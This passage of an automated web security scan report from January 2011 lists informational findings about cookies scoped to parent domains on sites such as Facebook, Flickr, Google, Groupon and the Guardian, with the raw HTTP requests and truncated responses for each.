Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/pages/CloudAccessnet/116931806748
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=Q5Jew; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Tue, 25 Jan 2011 00:00:09 GMT
Content-Length: 0

13.202. http://www.facebook.com/paty.kfoury previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/paty.kfoury

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=qOxUt; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpaty.kfoury; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpaty.kfoury; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /paty.kfoury HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

13.203. http://www.facebook.com/profile.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/profile.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=1Nf86; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D836605415; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile.php?id=836605415 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

13.204. http://www.facebook.com/sharer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sharer.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lsd=2yleE; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x80; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dwww1.whdh.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww1.whdh.com%252Fnews%252Farticles%252Flocal%252F12003359267921%252Fcommuter-rail-service-updates-for-jan-24%252F%26extra_2%3DUS;

Response

13.205. http://www.flickr.com/photos/aubalumni/4688630122/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/aubalumni/4688630122/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BX=cvj761d6jr9eq&b=3&s=q9; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
localization=en-us%3Bus%3Bus; expires=Thu, 23-Jan-2014 16:16:26 GMT; path=/; domain=.flickr.com
cookie_l10n=deleted; expires=Sun, 24-Jan-2010 16:16:25 GMT; path=/; domain=flickr.com
cookie_intl=deleted; expires=Sun, 24-Jan-2010 16:16:25 GMT; path=/; domain=flickr.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/aubalumni/4688630122/x22 HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.206. http://www.flickr.com/photos/favoritltd/4795390303/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/favoritltd/4795390303/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:12 GMT; path=/; domain=.flickr.com
cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:11 GMT; path=/; domain=flickr.com
cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:11 GMT; path=/; domain=flickr.com
fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:12 GMT; path=/; domain=.flickr.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/favoritltd/4795390303/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:12 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:12 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:11 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:11 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:12 GMT; path=/; domain=.flickr.com
X-Served-By: www53.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89342

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

<title>2010-02-23 18.36.45 | Flickr
...[SNIP]...

13.207. http://www.flickr.com/photos/favoritltd/4795390991/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/favoritltd/4795390991/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:10 GMT; path=/; domain=.flickr.com
cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:09 GMT; path=/; domain=flickr.com
cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:09 GMT; path=/; domain=flickr.com
fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:11 GMT; path=/; domain=.flickr.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/favoritltd/4795390991/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:10 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:10 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:09 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:09 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:11 GMT; path=/; domain=.flickr.com
X-Served-By: www57.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 88056

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

<title>2010-05-21 14.19.55 | Flickr
...[SNIP]...

13.208. http://www.flickr.com/photos/favoritltd/4795392149/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/favoritltd/4795392149/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:48 GMT; path=/; domain=.flickr.com
cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:47 GMT; path=/; domain=flickr.com
cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:47 GMT; path=/; domain=flickr.com
fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:48 GMT; path=/; domain=.flickr.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/favoritltd/4795392149/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:11:48 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:48 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:47 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:47 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:48 GMT; path=/; domain=.flickr.com
X-Served-By: www88.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 86022

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

<title>2010-03-05 17.55.24 | Flickr
...[SNIP]...

13.209. http://www.flickr.com/photos/favoritltd/4795392811/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/favoritltd/4795392811/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:45 GMT; path=/; domain=.flickr.com
cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:44 GMT; path=/; domain=flickr.com
cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:44 GMT; path=/; domain=flickr.com
fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:45 GMT; path=/; domain=.flickr.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/favoritltd/4795392811/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:11:45 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:45 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:44 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:44 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:45 GMT; path=/; domain=.flickr.com
X-Served-By: www30.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 83646

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

<title>2010-04-13 10.18.02 | Flickr
...[SNIP]...

13.210. http://www.flickr.com/photos/favoritltd/4796022554/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/favoritltd/4796022554/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:29 GMT; path=/; domain=.flickr.com
cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:28 GMT; path=/; domain=flickr.com
cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:28 GMT; path=/; domain=flickr.com
fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:29 GMT; path=/; domain=.flickr.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/favoritltd/4796022554/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:12:29 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:12:29 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:12:28 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:12:28 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:12:29 GMT; path=/; domain=.flickr.com
X-Served-By: www29.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 88059

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

<title>2010-03-29 14.38.40 | Flickr
...[SNIP]...

13.211. http://www.flickr.com/photos/favoritltd/4796024690/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.flickr.com
Path:	/photos/favoritltd/4796024690/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:55 GMT; path=/; domain=.flickr.com
cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:54 GMT; path=/; domain=flickr.com
cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:54 GMT; path=/; domain=flickr.com
fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:55 GMT; path=/; domain=.flickr.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /photos/favoritltd/4796024690/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BX=e88ol6d6i4psk&b=3&s=vs; localization=en-us%3Bus%3Bus;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:11:55 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 24-Jan-2014 13:11:55 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Mon, 25-Jan-2010 13:11:54 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Mon, 25-Jan-2010 13:11:54 GMT; path=/; domain=flickr.com
Set-Cookie: fldetectedlang=en-us; expires=Sat, 26-Mar-2011 13:11:55 GMT; path=/; domain=.flickr.com
X-Served-By: www65.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 88059

<!DOCTYPE html>
<html xmlns:dc="http://purl.org/dc/terms/" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:cc="http://creativecommons.org/ns#" lang="en-us">
<head>

<title>2010-04-13 10.21.19 | Flickr
...[SNIP]...

13.212. http://www.forumas.lithuanianjoomla.com/download.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.forumas.lithuanianjoomla.com
Path:	/download.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

phpbb3_9muwo_sid=268944692a8c1c07819ad84fccd17809; expires=Wed, 25-Jan-2012 00:02:37 GMT; path=/; domain=forumas.lithuanianjoomla.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /download.php HTTP/1.1
Host: www.forumas.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:02:37 GMT
Server: Apache
Set-Cookie: phpbb3_9muwo_u=1; expires=Wed, 25-Jan-2012 00:02:37 GMT; path=/; domain=forumas.lithuanianjoomla.com; HttpOnly
Set-Cookie: phpbb3_9muwo_k=; expires=Wed, 25-Jan-2012 00:02:37 GMT; path=/; domain=forumas.lithuanianjoomla.com; HttpOnly
Set-Cookie: phpbb3_9muwo_sid=268944692a8c1c07819ad84fccd17809; expires=Wed, 25-Jan-2012 00:02:37 GMT; path=/; domain=forumas.lithuanianjoomla.com; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 6674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="lt-lt" xml:lang="lt-lt">
<head>
...[SNIP]...

13.213. http://www.google.com/finance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/finance

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /finance?hl=en&tab=we HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

13.214. http://www.google.com/setprefs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/setprefs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:LD=en:TM=1293845297:LM=1295887187:GM=1:SG=2:S=vEi-6deBjxzySk34; expires=Wed, 23-Jan-2013 16:39:47 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /setprefs?sig=0_wmOEOqCEugI_DX4CRMM9-gOiSPQ=&suggon=2&prev=http://www.google.com/ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 302 Found
Location: http://www.google.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:LD=en:TM=1293845297:LM=1295887187:GM=1:SG=2:S=vEi-6deBjxzySk34; expires=Wed, 23-Jan-2013 16:39:47 GMT; path=/; domain=.google.com
Date: Mon, 24 Jan 2011 16:39:47 GMT
Server: gws
Content-Length: 219
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>
...[SNIP]...

13.215. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295887203:GM=1:IG=3:S=iMFWRuisrzY4aBh2; expires=Wed, 23-Jan-2013 16:40:03 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /url?sa=p&pref=ig&pval=3&q=http://www.google.com/ig%3Fhl%3Den%26source%3Diglk&usg=AFQjCNFA18XPfgb7dKnXfKz7x7g1GDH1tg HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 302 Found
Location: http://www.google.com/ig?hl=en&source=iglk
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295887203:GM=1:IG=3:S=iMFWRuisrzY4aBh2; expires=Wed, 23-Jan-2013 16:40:03 GMT; path=/; domain=.google.com
Date: Mon, 24 Jan 2011 16:40:03 GMT
Server: gws
Content-Length: 243
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/ig?hl=en&a
...[SNIP]...

13.216. http://www.groupon.com/washington-dc/subscribe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.groupon.com
Path:	/washington-dc/subscribe

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

_tpaid=Google; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
_tpcid=Explorer; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
_thepoint=e54b532010193ffb80929de47a093240; domain=.groupon.com; path=/; expires=Wed, 26 Jan 2011 04:41:06 GMT; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /washington-dc/subscribe?utm_source=Google&utm_medium=cpc&utm_campaign=Explorer&d=District_of_Columbia_-_Washington&p=joomlacode.org&a=Text/ HTTP/1.1
Host: www.groupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.217. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guardian.co.uk
Path:	/media/2011/jan/24/amazon-lovefilm-deal-films/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

GU_MU=VFQyc2xncjZER1lBQUJLMGhWRUFBQURPfDRITzhrOE5rMFFuWjR0VzZTc2w4T3c9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:10 GMT
GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjUyMzAyMjA5OTIyMDEyMjc5MjUzMjQyMTgxNDM4NTIzOTEyMDU4NDU=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:10 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /media/2011/jan/24/amazon-lovefilm-deal-films/x22 HTTP/1.1
Host: www.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:45:10 GMT
Server: Apache
Set-Cookie: GU_MU=VFQyc2xncjZER1lBQUJLMGhWRUFBQURPfDRITzhrOE5rMFFuWjR0VzZTc2w4T3c9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:10 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAxNjUyMzAyMjA5OTIyMDEyMjc5MjUzMjQyMTgxNDM4NTIzOTEyMDU4NDU=; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:10 GMT
Accept-Ranges: bytes
